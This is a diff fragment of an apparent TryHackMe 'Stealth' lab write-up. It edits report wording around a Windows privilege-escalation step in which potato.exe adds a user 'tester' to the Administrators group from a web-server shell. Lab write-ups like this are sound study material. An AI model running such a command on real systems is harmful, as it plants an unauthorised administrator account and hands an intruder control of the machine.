Schenkee/TryHackMe-Guides/Reports/Stealth_report.md

 Guest                    tester                   WDAGUtilityAccount
 The command completed successfully.
 ```
+The output above confirms the new user `tester` exists.

-The newly created `tester` user was then granted access to the `administrators` group:
+The newly created `tester` user was then granted access to the `Administrators` group:
 ```powershell
 evader@HostEvasion:C:\xampp\htdocs# .\potato.exe -cmd "net localgroup administrators tester /add" Removed for brevity